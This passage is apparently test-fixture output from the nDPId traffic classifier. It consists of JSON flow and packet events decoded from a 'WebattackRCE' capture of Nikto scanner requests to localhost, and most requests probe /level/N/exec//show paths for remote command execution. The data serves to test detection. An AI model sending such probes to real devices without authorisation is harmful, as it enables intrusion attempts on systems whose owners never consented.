+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277625,"flow_last_seen":1576420277625,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277625,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50744,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/43\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001290)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277627,"flow_last_seen":1576420277627,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277627,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_packet_id":1,"flow_last_seen":1576420277627,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277627,"pkt":"AAAAAAAAAAAAAAAACABFAADIYLhAAEAG23V\/AAABfwAAAcY6H5DQG1hJOevWU4AYAED+vAAAAQEICp1m\/qOdZv6iR0VUIC9sZXZlbC80NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTEpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277627,"flow_last_seen":1576420277627,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277627,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50746,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/44\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001291)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277628,"flow_last_seen":1576420277628,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277628,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_packet_id":1,"flow_last_seen":1576420277628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277628,"pkt":"AAAAAAAAAAAAAAAACABFAADID1ZAAEAGLNh\/AAABfwAAAcY8H5AV\/jesxRnzeoAYAED+vAAAAQEICp1m\/qSdZv6kR0VUIC9sZXZlbC80NS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjkyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277628,"flow_last_seen":1576420277628,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277628,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50748,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/45\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001292)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277630,"flow_last_seen":1576420277630,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277630,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_packet_id":1,"flow_last_seen":1576420277630,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277630,"pkt":"AAAAAAAAAAAAAAAACABFAADI0WBAAEAGas1\/AAABfwAAAcY+H5DCTOmi+t3hCIAYAED+vAAAAQEICp1m\/qWdZv6lR0VUIC9sZXZlbC80Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjkzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277630,"flow_last_seen":1576420277630,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277630,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50750,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/46\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001293)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277631,"flow_last_seen":1576420277631,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277631,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_packet_id":1,"flow_last_seen":1576420277631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277631,"pkt":"AAAAAAAAAAAAAAAACABFAADIlpVAAEAGpZh\/AAABfwAAAcZAH5Cryq5teKvsJoAYAED+vAAAAQEICp1m\/qedZv6nR0VUIC9sZXZlbC80Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTQpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277631,"flow_last_seen":1576420277631,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277631,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50752,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/47\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001294)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277633,"flow_last_seen":1576420277633,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277633,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_packet_id":1,"flow_last_seen":1576420277633,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277633,"pkt":"AAAAAAAAAAAAAAAACABFAADIENVAAEAGK1l\/AAABfwAAAcZCH5APvynUeLRgIoAYAED+vAAAAQEICp1m\/qmdZv6oR0VUIC9sZXZlbC80OC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjk1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277633,"flow_last_seen":1576420277633,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277633,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50754,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/48\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001295)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277637,"flow_last_seen":1576420277637,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277637,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_packet_id":1,"flow_last_seen":1576420277637,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277637,"pkt":"AAAAAAAAAAAAAAAACABFAADIJlxAAEAGFdJ\/AAABfwAAAcZEH5CFHB9c3vOX2IAYAED+vAAAAQEICp1m\/q2dZv6tR0VUIC9sZXZlbC80OS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277637,"flow_last_seen":1576420277637,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277637,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50756,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/49\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001296)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277639,"flow_last_seen":1576420277639,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277639,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":1,"flow_last_seen":1576420277639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277639,"pkt":"AAAAAAAAAAAAAAAACABFAADIZI9AAEAG155\/AAABfwAAAcZGH5DAl12NotXkTIAYAED+vAAAAQEICp1m\/q+dZv6vR0VUIC9sZXZlbC81MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277639,"flow_last_seen":1576420277639,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277639,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50758,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/50\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001297)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277642,"flow_last_seen":1576420277642,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277642,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_packet_id":1,"flow_last_seen":1576420277642,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277642,"pkt":"AAAAAAAAAAAAAAAACABFAADIuMhAAEAGg2V\/AAABfwAAAcZIH5DuPYHFtiFXooAYAED+vAAAAQEICp1m\/rKdZv6yR0VUIC9sZXZlbC81MS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjk4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":599,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":599,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277642,"flow_last_seen":1576420277642,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277642,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50760,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/51\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001298)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277644,"flow_last_seen":1576420277644,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277644,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50762,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_packet_id":1,"flow_last_seen":1576420277644,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277644,"pkt":"AAAAAAAAAAAAAAAACABFAADIp2FAAEAGlMx\/AAABfwAAAcZKH5BZVp5d6Tz88YAYAED+vAAAAQEICp1m\/rSdZv60R0VUIC9sZXZlbC81Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjk5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":600,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277644,"flow_last_seen":1576420277644,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277644,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50762,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/52\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001299)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277646,"flow_last_seen":1576420277646,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277646,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_packet_id":1,"flow_last_seen":1576420277646,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277646,"pkt":"AAAAAAAAAAAAAAAACABFAADIRMlAAEAG92R\/AAABfwAAAcZMH5Ck2n3FkPG1\/IAYAED+vAAAAQEICp1m\/radZv62R0VUIC9sZXZlbC81My9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzAwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":601,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277646,"flow_last_seen":1576420277646,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277646,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50764,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/53\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001300)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":602,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277648,"flow_last_seen":1576420277648,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277648,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50766,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 